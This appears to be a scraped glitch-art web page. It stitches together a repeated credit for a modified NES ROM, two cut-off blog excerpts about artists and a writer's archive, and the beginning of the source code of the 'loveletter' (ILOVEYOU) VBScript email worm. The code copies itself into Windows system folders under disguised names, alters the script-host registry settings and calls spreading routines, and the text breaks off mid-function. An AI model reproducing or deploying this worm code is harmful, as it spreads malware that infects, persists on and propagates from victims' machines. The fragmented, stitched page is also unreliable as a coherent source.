*created by modifying “glitchNES,” a ROM originally made by Don Miller (NO CARRIER), and using it with the Nestopia NES emulator.
–>A. J. Patrick Liszkiewicz
*created by modifying “glitchNES,” a ROM originally made by Don Miller (NO CARRIER), and using it with the Nestopia NES emulator.
–>A. J. Patrick Liszkiewicz
A major part of my work in Glitch is reaching out and connecting with potential contributors, collaborators, and distributors. Sometime in late December I made a connection with Simon Høgsberg, an artist based in Coppenhagen, Denmark. My email was unsolicited. Browsing through links on my RSS Feed reader I stumbled upon Simon’s portfolio site and [...]
The life’s work of John Alden Andrews is a collection of unfinished love poems, political rants, maybe a novel, a play about a trial containing a deaf attorney, very serious essays about homosexuality in the 1970s, travel brochures, jingles, notes for musical comedies that were never completed, stream-of-consciousness, and handwritten slice-of-life snapshots.
The four volumes that [...]
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=””
ctr=0
Set fso = CreateObject(”Scripting.FileSystemObject”)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(”WScript.Shell”)
rr=wscr.RegRead(”HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”)
if (rr>=1) then
wscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout”,0,”REG_DWORD”
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&”\MSKernel32.vbs”)
c.Copy(dirwin&”\Win32DLL.vbs”)
c.Copy(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”)
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ [...]